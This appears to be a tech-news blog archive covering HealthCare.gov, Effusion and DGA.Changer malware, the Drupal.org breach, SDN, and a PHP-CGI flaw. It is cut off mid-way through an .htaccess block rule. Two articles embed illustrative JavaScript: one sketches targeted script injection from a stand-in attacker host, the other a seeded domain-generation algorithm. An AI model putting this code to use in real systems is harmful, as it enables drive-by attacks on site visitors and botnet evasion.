Archive for the ‘Programming’ Category

Feds to dump CGI from project

Monday, January 13th, 2014

The Obama Administration is set to fire CGI Federal as the prime IT contractor for the problem-plagued HealthCare.gov website, a report says.

The government now plans to hire IT consulting firm Accenture to fix the Affordable Care Act (ACA) website’s lingering performance problems, the Washington Post reported today. Accenture will get a 12-month, $90 million contract to update the website, the newspaper reported.

The site is the main portal for consumers to sign up for new insurance plans under the Affordable Care Act.

CGI’s contract is due for renewal in February. The terms of the agreement included options for the U.S. to renew it for one more year and then for another two years after that.

The decision not to renew comes as frustration grows among officials of the Centers for Medicare and Medicaid Services (CMS), which oversees the ACA, about the pace and quality of CGI’s work, the Post said, quoting unnamed sources. About half of the software fixes written by CGI engineers in recent months have failed on the first attempt to use them, CMS officials told the Post.

The government awarded the contract to Accenture on a sole-source, or no-bid, basis because the CGI contract expires at the end of next month. That gives Accenture less than two months to familiarize itself with the project before it takes over the complex task of fixing numerous remaining glitches.

CGI did not immediately respond to Computerworld’s request for comment.

In an email, an Accenture spokesman declined to confirm or deny the report.

“Accenture Federal Services is in discussions with clients and prospective clients all the time, but it is not appropriate to discuss new business opportunities we may or may not be pursuing,” the spokesman said.

The decision to replace CGI comes as the performance of the website appears to be steadily improving after its spectacularly rocky Oct. 1 launch.

A later post mortem of the debacle showed that servers did not have the right production data, third-party systems weren’t connecting as required, dashboards didn’t have data, and there simply wasn’t enough server capacity to handle traffic.

Though CGI had promised to have the site ready and fully functional by Oct. 1, between 30% and 40% of the site had yet to be completed at the time. The company has taken a lot of the heat since.

Ironically, the company has impressive credentials. CGI is nowhere near as big as the largest government IT contractors, but it is one of only 10 companies in the U.S. to have achieved the highest Capability Maturity Model Integration (CMMI) certification level for software development.

CGI Federal is a subsidiary of Montreal-based CGI Group. CMS hired the company as the main IT contractor for HealthCare.gov in 2011 under an $88 million contract. So far, the firm has received about $113 million for its work on the site.


Cyber criminals offer malware for Nginx, Apache Web servers

Thursday, December 26th, 2013

A new malware program that functions as a module for the Apache and Nginx Web servers is being sold on cybercrime forums, according to researchers from security firm IntelCrawler.

The malware is called Effusion and according to the sales pitch seen by IntelCrawler, a start-up firm based in Los Angeles that specializes in cybercrime intelligence, it can inject code in real time into websites hosted on the compromised Web servers. By injecting content into a website, attackers can redirect visitors to exploits or launch social engineering attacks.

The Effusion module works with Nginx from version 0.7 up to the latest stable version, 1.4.4, and with Apache running on 32- and 64-bit versions of Linux and FreeBSD. Modules extend Apache’s and Nginx’s core functionality.

The malware can inject rogue code into static content of certain MIME types, including JavaScript and HTML, and in PHP templates at the start, end or after a specific tag. Attackers can push configuration updates and control code modifications remotely.

Filters can also be used to restrict when the injection happens. Effusion supports filtering by Referer header, which can be used to target only visitors that come from specific websites; by User-Agent header, which can be used to target users of specific browsers; and by IP address or address range.
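The filtering logic described above can be sketched in a few lines. This is an illustrative sketch only, not Effusion’s actual code; the payload, rule names, and addresses are hypothetical. It shows how a malicious server module might decide, per request, whether to inject content based on the Referer header, the User-Agent header, and the client IP.

```javascript
'use strict';

// Hypothetical payload for illustration; a real attack would inject a
// link to an exploit kit or social-engineering page.
const PAYLOAD = '<script src="//attacker.invalid/x.js"></script>';

// A rule matches only if every configured filter matches; unset filters pass.
function shouldInject(req, rules) {
  const referer = req.headers['referer'] || '';
  const ua = req.headers['user-agent'] || '';
  const refOk = !rules.refererIncludes || referer.includes(rules.refererIncludes);
  const uaOk = !rules.userAgentIncludes || ua.includes(rules.userAgentIncludes);
  const ipOk = !rules.ipPrefix || req.ip.startsWith(rules.ipPrefix);
  return refOk && uaOk && ipOk;
}

function filterResponse(req, body, rules) {
  if (!shouldInject(req, rules)) return body; // non-targets see the clean page
  // Mimics "inject after a specific tag": insert just before </body>.
  return body.replace('</body>', PAYLOAD + '</body>');
}

// Example: target Windows browsers arriving from a search engine,
// within one address range (all values hypothetical).
const rules = { refererIncludes: 'google.', userAgentIncludes: 'Windows', ipPrefix: '203.0.' };
const visitor = {
  ip: '203.0.113.9',
  headers: { referer: 'https://google.com/search?q=x', 'user-agent': 'Mozilla/5.0 (Windows NT 6.1)' },
};
const page = '<html><body>hello</body></html>';
const injected = filterResponse(visitor, page, rules);
```

The selectivity is the point: researchers fetching the page from the wrong address or with the wrong browser string receive the unmodified response, which makes the compromise harder to spot.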

The malware can check whether it has root access, something that could allow the attackers greater control over the underlying system. It can also delete the injected content when suspicious processes are detected in order to hide itself, Andrey Komarov, IntelCrawler’s CEO, said via email.

The Effusion authors offer precompiled builds for $2,500 per build and plan to vet buyers, Komarov said. This suggests they’re interested in selling it only to a limited number of people so they can continue to offer support and develop the malware at the same time, he said.

While this is not the first malware to function as an Apache module, it is one of the very few so far to also target Nginx, a high-performance Web server that has grown considerably in popularity in recent years.

According to a December Web server survey by Internet services firm Netcraft, Nginx is the third most widely used Web server software after Apache and Microsoft IIS, and has a market share of over 14%. Because it’s built to handle high numbers of concurrent connections, it is used to host heavily trafficked websites including Netflix, Hulu, Pinterest, CloudFlare, Airbnb, GitHub and SoundCloud.


Unique malware evades sandboxes

Thursday, December 19th, 2013

Malware used in attack on PHP last month dubbed DGA.Changer

Malware utilized in the attack last month on the php.net developers’ site used a unique approach to avoid detection, a security expert says.

On Wednesday, security vendor Seculert reported finding that one of five malware types used in the attack had a unique cloaking property for evading sandboxes. The company called the malware DGA.Changer.

DGA.Changer’s only purpose was to download other malware onto infected computers, Aviv Raff, chief technology officer for Seculert, said on the company’s blog. Seculert identified 6,500 compromised computers communicating with the malware’s command and control server. Almost 60 percent were in the United States.

What Seculert found unique was how the malware could receive a command from a C&C server to change the seed of the software’s domain generation algorithm. The DGA periodically generates a large number of domain names as potential communication points to the C&C server, thereby making it difficult for researchers and law enforcement to find the right domain and possibly shut down the botnet.

“What the attackers behind DGA did is basically change the algorithm on the fly, so they can tell the malware to create a new stream of domains automatically,” Raff told CSOonline.

When the malware generates the same list of domains, it can be detected in the sandbox where security technology will isolate suspicious files. However, changing the algorithm on demand means that the malware won’t be identified.
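The mechanism Raff describes can be made concrete with a toy sketch. This is not DGA.Changer’s actual algorithm; it is a minimal seeded DGA, assuming a simple deterministic PRNG (mulberry32 here) and `.com` names, to show why re-seeding defeats list-based fingerprinting: the same seed always reproduces the same domain list, while a new seed yields an entirely different stream.

```javascript
'use strict';

// Small deterministic PRNG (mulberry32) so the domain stream is
// reproducible from a seed, like a real DGA.
function mulberry32(seed) {
  return function () {
    seed |= 0; seed = (seed + 0x6D2B79F5) | 0;
    let t = Math.imul(seed ^ (seed >>> 15), 1 | seed);
    t = (t + Math.imul(t ^ (t >>> 7), 61 | t)) ^ t;
    return ((t ^ (t >>> 14)) >>> 0) / 4294967296;
  };
}

// Generate `count` pseudo-random domain names from a seed.
function generateDomains(seed, count) {
  const rand = mulberry32(seed);
  const domains = [];
  for (let i = 0; i < count; i++) {
    const len = 8 + Math.floor(rand() * 8); // 8-15 characters
    let name = '';
    for (let j = 0; j < len; j++) {
      name += String.fromCharCode(97 + Math.floor(rand() * 26)); // a-z
    }
    domains.push(name + '.com');
  }
  return domains;
}

// Same seed -> identical list (what a sandbox can fingerprint).
const listA = generateDomains(42, 5);
const listB = generateDomains(42, 5);
// New seed pushed from the C&C server -> a completely new stream.
const listC = generateDomains(1337, 5);
```

A sandbox that has catalogued the domains from seed 42 learns nothing about the stream produced after the attackers switch the seed, which is the evasion Seculert observed.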

“This is a new capability that didn’t exist before,” Raff said. “This capability allows the attacker to bypass sandbox technology.”

Hackers working for a nation-state targeting specific entities, such as government agencies, think tanks or international corporations, would use this type of malware, according to Raff. Called advanced persistent threats, these hackers tend to use sophisticated attack tools.

An exploit kit that served five different malware types was used in compromising two servers of php.net, a site for downloads and documentation related to the PHP general-purpose scripting language used in Web development. Google spotted four pages on the site serving malicious JavaScript that targeted personal computers, but ignored mobile devices.

The attack was noteworthy because of the number of visitors to php.net, which is in the top 250 domains on the Internet, according to Alexa rankings.

To defend against DGA.Changer, companies would need a tool that looks for abnormal behavior in network traffic. The malware tends to generate unusual traffic by querying lots of domains in search of the one leading to the C&C server.

“Because this malware will try to go to different domains, it will generate suspicious traffic,” Raff said.

Seculert did not find any evidence that would indicate who was behind the attack.

“This is a group that’s continuously updating this malicious software, so this is a work in progress,” Raff said.


Google’s Dart language heads for standardization with new Ecma committee

Friday, December 13th, 2013

Ecma, the same organization that governs the standardization and development of JavaScript (or “EcmaScript” as it’s known in standardese), has created a committee to oversee the publication of a standard for Google’s alternative Web language, Dart.

Technical Committee 52 will develop standards for Dart language and libraries, create test suites to verify conformance with the standards, and oversee Dart’s future development. Other technical committees within Ecma perform similar work for EcmaScript, C#, and the Eiffel language.

Google released version 1.0 of the Dart SDK last month and believes that the language is sufficiently stable and mature to be both used in a production capacity and put on the track toward creating a formal standard. The company asserts that this will be an important step toward embedding native Dart support within browsers.


HP: 90 percent of Apple iOS mobile apps show security vulnerabilities

Tuesday, November 19th, 2013

HP today said security testing it conducted on more than 2,000 Apple iOS mobile apps developed for commercial use by some 600 large companies in 50 countries showed that nine out of 10 had serious vulnerabilities.

Mike Armistead, HP vice president and general manager, said testing was done on apps from 22 iTunes App Store categories that are used for business-to-consumer or business-to-business purposes, such as banking or retailing. HP said 97 percent of these apps inappropriately accessed private information sources within a device, and 86 percent proved to be vulnerable to attacks such as SQL injection.

The Apple guidelines for developing iOS apps help developers, but they don’t go far enough in terms of security, says Armistead. Mobile apps are being used to extend the corporate website to mobile devices, but companies in the process “are opening up their attack surfaces,” he says.

In its summary of the testing, HP said 86 percent of the apps tested lacked the means to protect themselves from common exploits, such as misuse of encrypted data, cross-site scripting and insecure transmission of data.

The same number did not have security optimized early in the development process, according to HP. Three quarters “did not use proper encryption techniques when storing data on mobile devices, which leaves unencrypted data accessible to an attacker.” A large number of the apps didn’t implement SSL/HTTPS correctly. To discover weaknesses in apps, developers need to employ practices such as security scanning of apps, penetration testing and a secure coding development life-cycle approach, HP advises.

The need to develop mobile apps quickly for business purposes is one of the main contributing factors leading to weaknesses in these apps made available for public download, according to HP. And the weakness on the mobile side is impacting the server side as well.

“It is our earnest belief that the pace and cost of development in the mobile space has hampered security efforts,” HP says in its report, adding that “mobile application security is still in its infancy.”

HealthCare.gov code allegedly two times larger than Facebook, Windows, and OS X combined

Thursday, October 24th, 2013
(Credit: KAREN BLEIER/AFP/Getty Images)

HealthCare.gov is in shambles. Republicans, on the heels of the House’s failure to gut the Affordable Care Act (ACA), are whipping up a firestorm of criticism. Health Secretary Kathleen Sebelius is facing calls for resignation, and critics — and satirists — are asking everyone from ex-fugitive John McAfee to Edward Snowden to weigh in on the issues.

The latest controversy revolves around The New York Times’ reporting that roughly 1 percent of HealthCare.gov — or 5 million lines of code — would need to be rewritten, putting the Web site’s total size at a mind-boggling 500 million lines of code — a scale that suggests months upon months of work.

Some are naturally skeptical of that ridiculous-sounding number — as well as the credibility of The New York Times’ source, who remains unnamed. Forums of programmers on sites like Reddit have postulated that, if true, it would have to involve mounds of bloated legacy code from past systems — making it one of the largest Web systems ever built. One developer, Alex Marchant of Orange, Calif., decided to draw an interesting comparison to point that out.

Marchant’s chart included Facebook.com, which he says nears 75 million lines of code (though it’s likely larger, because his source excludes back-end components); OS X 10.4 Tiger; and Windows XP. Still, at 500 million lines, HealthCare.gov is more than two times larger than all three combined.

(Credit: Alex Marchant)

For further perspective, makers of the multiplayer online game World of Warcraft regularly maintain 5.5 million lines of code for the game’s more than 7 million subscribers. How about the code that runs a gigantic, multinational bank? The Bank of New York Mellon, the oldest banking corporation in the US and the largest deposit bank in the world with close to $30 trillion in total assets, has a system built upon 112,500 Cobol programs, which amounts to 343 million lines of code.

Those examples are enough to make you think something is amiss in the 500 million figure. Still, it would come as no surprise if HealthCare.gov — plugged into thousands of outdated systems, containing countless redundancies, and rushed out the door with little technical oversight — were, in fact, the most bloated piece of software to ever hit the Web.

Source:  CNET


US FDA to regulate only medical apps that could be risky if malfunctioning

Tuesday, September 24th, 2013

The FDA said the mobile platform brings its own unique risks when used for medical applications

The U.S. Food and Drug Administration intends to regulate only mobile apps that are medical devices and could pose a risk to a patient’s safety if they do not function as intended.

Some of the risks could be unique to the choice of the mobile platform. The interpretation of radiological images on a mobile device could, for example, be adversely affected by the smaller screen size, lower contrast ratio and uncontrolled ambient light of the mobile platform, the agency said in its recommendations released Monday. The FDA said it intends to take the “risks into account in assessing the appropriate regulatory oversight for these products.”

The nonbinding recommendations to developers of mobile medical apps only reflect the FDA’s current thinking on the topic, the agency said. The guidance document is being issued to clarify the small group of mobile apps that the FDA aims to scrutinize, it added.

The recommendations would leave out of FDA scrutiny a majority of mobile apps that could be classified as medical devices but pose a minimal risk to consumers, the agency said.

The FDA said it is focusing its oversight on mobile medical apps that are to be used as accessories to regulated medical devices or transform a mobile platform into a regulated medical device such as an electrocardiography machine.

“Mobile medical apps that undergo FDA review will be assessed using the same regulatory standards and risk-based approach that the agency applies to other medical devices,” the agency said.

It also clarified that its oversight would be platform neutral. Mobile apps to analyze and interpret EKG waveforms to detect heart function irregularities would be considered similar to software running on a desktop computer that serves the same function, which is already regulated.

“FDA’s oversight approach to mobile apps is focused on their functionality, just as we focus on the functionality of conventional devices. Our oversight is not determined by the platform,” the agency said in its recommendations.

The FDA has cleared about 100 mobile medical applications over the past decade of which about 40 were cleared in the past two years. The draft of the guidance was first issued in 2011.


Will software-defined networking kill network engineers’ beloved CLI?

Tuesday, September 3rd, 2013

Networks defined by software may require more coding than command lines, leading to changes on the job

SDN (software-defined networking) promises some real benefits for people who use networks, but to the engineers who manage them, it may represent the end of an era.

Ever since Cisco made its first routers in the 1980s, most network engineers have relied on a CLI (command-line interface) to configure, manage and troubleshoot everything from small-office LANs to wide-area carrier networks. Cisco’s isn’t the only CLI, but on the strength of the company’s domination of networking, it has become a de facto standard in the industry, closely emulated by other vendors.

As such, it’s been a ticket to career advancement for countless network experts, especially those certified as CCNAs (Cisco Certified Network Associates). Those network management experts, along with higher level CCIEs (Cisco Certified Internetwork Experts) and holders of other official Cisco credentials, make up a trained workforce of more than 2 million, according to the company.

A CLI is simply a way to interact with software by typing in lines of commands, as PC users did in the days of DOS. With the Cisco CLI and those that followed in its footsteps, engineers typically set up and manage networks by issuing commands to individual pieces of gear, such as routers and switches.

SDN, and the broader trend of network automation, uses a higher layer of software to control networks in a more abstract way. Whether through OpenFlow, Cisco’s ONE (Open Network Environment) architecture, or other frameworks, the new systems separate the so-called control plane of the network from the forwarding plane, which is made up of the equipment that pushes packets. Engineers managing the network interact with applications, not ports.

“The network used to be programmed through what we call CLIs, or command-line interfaces. We’re now changing that to create programmatic interfaces,” Cisco Chief Strategy Officer Padmasree Warrior said at a press event earlier this year.

Will SDN spell doom for the tool that network engineers have used throughout their careers?

“If done properly, yes, it should kill the CLI. Which scares the living daylights out of the vast majority of CCIEs,” Gartner analyst Joe Skorupa said. “Certainly all of those who define their worth in their job as around the fact that they understand the most obscure Cisco CLI commands for configuring some corner-case BGP4 (Border Gateway Protocol 4) parameter.”

At some of the enterprises that Gartner talks to, the backlash from some network engineers has already begun, according to Skorupa.

“We’re already seeing that group of CCIEs doing everything they can to try and prevent SDN from being deployed in their companies,” Skorupa said. Some companies have deliberately left such employees out of their evaluations of SDN, he said.

Not everyone thinks the CLI’s days are numbered. SDN doesn’t go deep enough to analyze and fix every flaw in a network, said Alan Mimms, a senior architect at F5 Networks.

“It’s not obsolete by any definition,” Mimms said. He compared SDN to driving a car and CLI to getting under the hood and working on it. For example, for any given set of ACLs (access control lists) there are almost always problems for some applications that surface only after the ACLs have been configured and used, he said. A network engineer will still have to use CLI to diagnose and solve those problems.

However, SDN will cut into the use of CLI for more routine tasks, Mimms said. Network engineers who know only CLI will end up like manual laborers whose jobs are replaced by automation. It’s likely that some network jobs will be eliminated, he said.

This isn’t the first time an alternative has risen up to challenge the CLI, said Walter Miron, a director of technology strategy at Canadian service provider Telus. There have been graphical user interfaces to manage networks for years, he said, though they haven’t always had a warm welcome. “Engineers will always gravitate toward a CLI when it’s available,” Miron said.

Even networking startups need to offer a Cisco CLI so their customers’ engineers will know how to manage their products, said Carl Moberg, vice president of technology at Tail-F Systems. Since 2005, Tail-F has been one of the companies going up against the prevailing order.

It started by introducing ConfD, a graphical tool for configuring network devices, which Cisco and other major vendors included with their gear, according to Moberg. Later the company added NCS (Network Control System), a software platform for managing the network as a whole. To maintain interoperability, NCS has interfaces to Cisco’s CLI and other vendors’ management systems.

CLIs have their roots in the very foundations of the Internet, according to Moberg. The approach of the Internet Engineering Task Force, which oversees IP (Internet Protocol), has always been to find pragmatic solutions to defined problems, he said. This detail-oriented, “bottom up” orientation was different from the way cellular networks were designed. The 3GPP, which developed the GSM standard used by most cell carriers, crafted its entire architecture at once, he said.

The IETF’s approach lent itself to manual, device-by-device administration, Moberg said. But as networks got more complex, that technique ran into limitations. Changes to networks are now more frequent and complex, so there’s more room for human error and the cost of mistakes is higher, he said.

“Even the most hardcore Cisco engineers are sick and tired of typing the same commands over and over again and failing every 50th time,” Moberg said. Though the CLI will live on, it will become a specialist tool for debugging in extreme situations, he said.

“There’ll always be some level of CLI,” said Bill Hanna, vice president of technical services at University of Pittsburgh Medical Center. At the launch earlier this year of Nuage Networks’ SDN system, called Virtualized Services Platform, Hanna said he hoped SDN would replace the CLI. The number of lines of code involved in a system like VSP is “scary,” he said.

On a network fabric with 100,000 ports, it would take all day just to scroll through a list of the ports, said Vijay Gill, a general manager at Microsoft, on a panel discussion at the GigaOm Structure conference earlier this year.

“The scale of systems is becoming so large that you can’t actually do anything by hand,” Gill said. Instead, administrators now have to operate on software code that then expands out to give commands to those ports, he said.

Faced with these changes, most network administrators will fall into three groups, Gartner’s Skorupa said.

The first group will “get it” and welcome not having to troubleshoot routers in the middle of the night. They would rather work with other IT and business managers to address broader enterprise issues, Skorupa said. The second group won’t be ready at first but will advance their skills and eventually find a place in the new landscape.

The third group will never get it, Skorupa said. They’ll face the same fate as telecommunications administrators who relied for their jobs on knowing obscure commands on TDM (time-division multiplexing) phone systems, he said. Those engineers got cut out when circuit-switched voice shifted over to VoIP (voice over Internet Protocol) and went onto the LAN.

“All of that knowledge that you had amassed over decades of employment got written to zero,” Skorupa said. For IP network engineers who resist change, there will be a cruel irony: “SDN will do to them what they did to the guys who managed the old TDM voice systems.”

But SDN won’t spell job losses, at least not for those CLI jockeys who are willing to broaden their horizons, said analyst Zeus Kerravala of ZK Research.

“The role of the network engineer, I don’t think, has ever been more important,” Kerravala said. “Cloud computing and mobile computing are network-centric compute models.”

Data centers may require just as many people, but with virtualization, the sharply defined roles of network, server and storage engineer are blurring, he said. Each will have to understand the increasingly interdependent parts.

The first step in keeping ahead of the curve, observers say, may be to learn programming.

“The people who used to use CLI will have to learn scripting and maybe higher-level languages to program the network, or at least to optimize the network,” said Pascale Vicat-Blanc, founder and CEO of application-defined networking startup Lyatiss, during the Structure panel.

Microsoft’s Gill suggested network engineers learn languages such as Python, C# and PowerShell.

For Facebook, which takes a more hands-on approach to its infrastructure than do most enterprises, that future is now.

“If you look at the Facebook network engineering team, pretty much everybody’s writing code as well,” said Najam Ahmad, Facebook’s director of technical operations for infrastructure.

Network engineers historically have used CLIs because that’s all they were given, Ahmad said. “I think we’re underestimating their ability.”

Cisco is now gearing up to help its certified workforce meet the newly emerging requirements, said Tejas Vashi, director of product management for Learning@Cisco, which oversees education, testing and certification of Cisco engineers.

With software automation, the CLI won’t go away, but many network functions will be carried out through applications rather than manual configuration, Vashi said. As a result, network designers, network engineers and support engineers all will see their jobs change, and there will be a new role added to the mix, he said.

In the new world, network designers will determine network requirements and how to fulfill them, then use that knowledge to define the specifications for network applications. Writing those applications will fall to a new type of network staffer, which Learning@Cisco calls the software automation developer. These developers will have background knowledge about networking along with skills in common programming languages such as Java, Python, and C, said product manager Antonella Como. After the software is written, network engineers and support engineers will install and troubleshoot it.

“All these people need to somewhat evolve their skills,” Vashi said. Cisco plans to introduce a new certification involving software automation, but it hasn’t announced when.

Despite the changes brewing in networks and jobs, the larger lessons of all those years typing in commands will still pay off for those who can evolve beyond the CLI, Vashi and others said.

“You’ve got to understand the fundamentals,” Vashi said. “If you don’t know how the network infrastructure works, you could have all the background in software automation, and you don’t know what you’re doing on the network side.”


Important security update: Reset your password

Thursday, May 30th, 2013

The Drupal.org Security Team and Infrastructure Team have discovered unauthorized access to account information on Drupal.org and groups.drupal.org.

This access was accomplished via third-party software installed on the Drupal.org server infrastructure, and was not the result of a vulnerability within Drupal itself. This notice applies specifically to user account data stored on Drupal.org and groups.drupal.org, and not to sites running Drupal generally.

Information exposed includes usernames, email addresses, and country information, as well as hashed passwords. However, we are still investigating the incident and may learn about other types of information compromised, in which case we will notify you accordingly. As a precautionary measure, we’ve reset all account holder passwords and are requiring users to reset their passwords at their next login attempt. A user password can be changed at any time by taking the following steps.

  1. Go to the Drupal.org password reset page.
  2. Enter your username or email address.
  3. Check your email and follow the link to enter a new password.
    • It can take up to 15 minutes for the password reset email to arrive. If you do not receive the e-mail within 15 minutes, make sure to check your spam folder as well.

All passwords are both hashed and salted, although some older passwords on some subsites were not salted.

See below for recommendations on additional measures that you can take to protect your personal information.

What happened?

Unauthorized access was made via third-party software installed on the server infrastructure, and was not the result of a vulnerability within Drupal itself. We have worked with the vendor to confirm it is a known vulnerability and has been publicly disclosed. We are still investigating and will share more detail when it is appropriate. Upon discovering the files during a security audit, we shut down the website to mitigate any possible ongoing security issues related to the files. The Drupal Security Team then began forensic evaluations and discovered that user account information had been accessed via this vulnerability.

The suspicious files may have exposed profile information like username, email address, hashed password, and country. In addition to resetting your password on, we are also recommending a number of measures (below) for further protection of your information, including, among others, changing or resetting passwords on other sites where you may use similar passwords.

What are we doing about it?

We take security very seriously on Drupal.org. As attacks on high-profile sites (regardless of the software they are running) are common, we strive to continuously improve the security of all sites.

To that end, we have taken the following steps to secure the infrastructure:

  • Staff at the OSU Open Source Lab (where Drupal.org is hosted) and the infrastructure teams rebuilt the production, staging, and development webheads, and GRSEC secure kernels were added to most servers
  • We are scanning Drupal.org and have not found any additional malicious or dangerous files, and we are making scanning a routine part of our process
  • There are many subsites on Drupal.org, including older sites for specific events. We created static archives of those sites.

We would also like to acknowledge that we are conducting an investigation into the incident, and we may not be able to immediately answer all of the questions you may have. However, we are committed to transparency and will report to the community once we have an investigation report.

If you have any reason to believe that your information has been accessed by someone other than yourself, please contact the Drupal Association immediately. We regret this occurred and want to assure you we are working hard to improve security.


Node.js integrates with M: Next big thing in healthcare IT

Thursday, February 7th, 2013

Join the M revolution and the next big thing in healthcare IT: the integration of Node.js with M, the NoSQL hierarchical database.

M was developed to organize and access, with high efficiency, the type of data typically managed in healthcare, making it uniquely well suited for the job.

One of the biggest reasons for the success of M is that it integrates the database into the language in a natural and seamless way. The growth and involvement of the community of M developers, however, have been below the radar for educators and the larger IT community. As a consequence, M has faced challenges recruiting young new developers, despite the critical importance of this technology for supporting the health IT infrastructure of the US.

At the recent 26th VistA Community Meeting, an exciting alternative was presented by Rob Tweed. I summarize it as: Node.js meets the M Database.

In his work, Rob has created a tight integration between the M database and the language features of node.js. The result is a new way of accessing the M database from JavaScript code in which the developer doesn’t feel that they are accessing a database at all.

It is now possible to access M from node.js, both with InterSystems Caché and with the open source M implementation GT.M. The GT.M interface was implemented by David Wicksell, based on the API previously defined for Caché in the GlobalsDB project.

In a recent blog post, Rob describes some of the natural notation in node.js that provides access to the M hierarchical database by nicely following the language patterns of JavaScript. Here are some of Rob’s examples:

The M expression:

set town = ^patient(123456, "address", "town")

becomes the JavaScript expression:

 var town = patient.$('address').$('town')._value;

with some flavor of jQuery.

The following M expression of a healthcare typical example:

^patient(123456,"conditions",0,"description")="Diagnosis, Active: Hospital Measures - AMI (Code List: 2.16.840.1.113883.3.666.5.3011)"

becomes the following JSON data structure, which can be manipulated with JavaScript:

var patient = new ewd.GlobalNode("patient", [123456]);

var document = {
  "birthdate": -851884200,
  "conditions": [
    {
      "causeOfDeath": null,
      "codes": {
        "ICD-9-CM": [ /* codes elided */ ],
        "ICD-10-CM": [ /* codes elided */ ]
      },
      "description": "Diagnosis, Active: Hospital Measures - AMI (Code List: 2.16.840.1.113883.3.666.5.3011)",
      "end_time": 1273104000
    }
  ]
};

More detailed examples, along with the M module for node.js itself, are available via Rob’s blog post.
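To make the mapping concrete, here is a toy stand-in, written in plain JavaScript, that mimics the chained $() notation over an ordinary object rather than a real M database. The GlobalNode function and sample data below are illustrative inventions, not the actual ewd.GlobalNode API:

```javascript
// Toy illustration of the M-global-to-JavaScript notation. A node wraps
// a subscript path into a nested plain object; _value reads the leaf,
// mimicking patient.$('address').$('town')._value.
function GlobalNode(store, path) {
  return {
    $: function (subscript) {
      // Descend one level by extending the subscript path.
      return GlobalNode(store, path.concat(subscript));
    },
    get _value() {
      // Walk the path through the nested object to the leaf value.
      return path.reduce(function (node, key) {
        return node === undefined ? undefined : node[key];
      }, store);
    }
  };
}

// Stand-in for the global ^patient(123456, "address", "town")
var store = { 123456: { address: { town: 'Redhill' } } };

var patient = GlobalNode(store, [123456]);
var town = patient.$('address').$('town')._value;
console.log(town); // prints "Redhill"
```

In the real module the store is the M database itself, so the same traversal becomes persistent, hierarchical key access rather than an in-memory lookup.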

What this achieves is seamless integration between the powerful M hierarchical database and the language features of JavaScript in the very popular node.js runtime. This integration becomes a great opportunity for hundreds of node.js developers to join the space of healthcare IT, and to do, as Tim O’Reilly advises: Work on Stuff that Matters!

M is currently being used in hundreds of hospitals in the public sector:

  • The Department of Veterans Affairs
  • The Department of Defense
  • The Indian Health Service

As well as at hundreds of hospitals and institutions in the private sector:

  • Kaiser Permanente hospital system
  • Johns Hopkins
  • Beth Israel Deaconess Medical Center
  • Harvard Medical School

In particular at deployments of these EHR systems:

  • Epic
  • GE/Centricity
  • McKesson
  • Meditech

Given this, along with the large popularity of JavaScript and the high efficiency of node.js, this integration may be the most significant development in healthcare IT in recent years.

If you are a node.js enthusiast, are looking for the next language to learn, or want to do some social good, this could be the thing for you.


Microsoft opens up access to cloud-based ALM server

Monday, June 11th, 2012

The Team Foundation Service, which had been invitation-only, is now open to anyone, but it still is in preview mode

Microsoft is expanding access to its cloud-based application lifecycle management service, although the service still remains in preview mode.

At its TechEd conference in Orlando, Fla., on Monday, the company will announce that anyone can use its Team Foundation Service ALM server, which is hosted on Microsoft’s Windows Azure cloud. First announced last September, the preview had been limited to invitation-only usage. Since it remains in a preview phase, the service can be used free of charge.

“Anybody who wants to try it can try it,” said Brian Harry, Microsoft technical fellow and product line manager for Team Foundation Server, the behind-the-firewall version of the ALM server. Developers can access Team Foundation Service at the Team Foundation Service preview site.

Through the cloud ALM service, developers can plan projects, collaborate, and manage code online. Code is checked into the cloud using the Visual Studio or Eclipse IDEs. Languages ranging from C# to Python are supported, as are such platforms as Windows and Android.

With Team Foundation Service, Microsoft expects to compete with rival tools like Atlassian Jira. “Team Foundation Service is a full application lifecycle management product that provides a rich set of capabilities from early project planning and management through development, testing, and deployment,” Harry said. “We’ve got the most comprehensive ALM tool in the market, and it is simple and easy to use and easy to get started.” Eventually, Microsoft will charge for use of Team Foundation Service, but it will not happen this year, Harry said.

Microsoft has been adding capabilities to Team Foundation Service every three weeks. A new continuous deployment feature enables applications to be deployed to Azure automatically. A build service was added in March. On Monday, Microsoft will announce the addition of a rich landing page with more information about the product.


Attackers target unpatched PHP bug allowing malicious code execution

Tuesday, May 8th, 2012

Installing a 13-line patch is one of the steps security researchers suggest webmasters take immediately to prevent attacks that exploit an unpatched vulnerability in the PHP scripting language.

A huge number of websites around the world are endangered by an unpatched vulnerability in the PHP scripting language that attackers are already trying to exploit to remotely take control of underlying servers, security researchers warned.

The code-execution attacks threaten PHP websites only when they run in common gateway interface (CGI) mode, Darian Anthony Patrick, a Web application security consultant with Criticode, told Ars. Sites running PHP in FastCGI mode aren’t affected. Nobody knows exactly how many websites are at risk, because sites also must meet several other criteria to be vulnerable, including not having a firewall that blocks certain ports. Nonetheless, sites running CGI-configured PHP on the Apache webserver are by default vulnerable to attacks that make it easy for hackers to run code that plants backdoors or downloads files containing sensitive user data.

Making matters worse, full details of the bug became public last week, giving attackers everything they need to locate and exploit vulnerable websites.

“The huge issue is the remote code execution, and that’s really easy to figure out how to do,” Patrick said. “If I as an attacker found it existed on a particular site, it would be exciting because I own everything. It’s the kind of vulnerability where it’s probably not super prevalent, but if it’s there, it’s not a minor thing.”

According to security researcher Ryan Barnett, exploits are already being attempted against servers that are part of a honeypot set up by Trustwave’s Spider Labs to detect Web-based attacks. While some of the Web requests observed appear to be simple probes designed to see if sites are vulnerable, others contain remote file inclusion parameters that attempt to execute code of the attacker’s choosing on vulnerable servers.

“Because this is honeypot stuff and we’re not actually running all of these live applications, we can’t be sure what I’m showing actually would work,” Barnett told Ars. “We just wanted to show that yes, bad guys are actively scanning for this.”

In a series of Twitter dispatches made in response to this article, blogger Trevor Pott said he’s seeing a dozen such attack attempts every hour against smaller websites, including his own. The attempts appear to be made by infected computers located in the US and China, for the purpose of seeding sites with malware used in drive-by download attacks.

What’s more, the open-source Metasploit framework used by hackers and penetration testers to exploit known vulnerabilities has been updated to include the exploit, providing a point-and-click interface for remotely carrying out the code execution attacks. Making matters worse, an update that PHP maintainers released late last week to patch the hole can easily be bypassed, leaving vulnerable websites at risk even after applying the fix.

Patrick said websites that run PHP in CGI mode should install the update anyway and then follow several steps to mitigate their exposure, including applying a second patch published last week by independent researchers. Barnett’s post also includes steps webmasters can follow to protect themselves against exploits.
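For reference, the widely circulated .htaccess workaround at the time rejected query strings that contain a dash but no “=” sign, the pattern that lets a query string reach php-cgi as command-line switches. (Shown as an illustration of the approach; verify the exact rules against your own configuration before relying on them.)

```apache
# Block requests whose query string looks like php-cgi switches:
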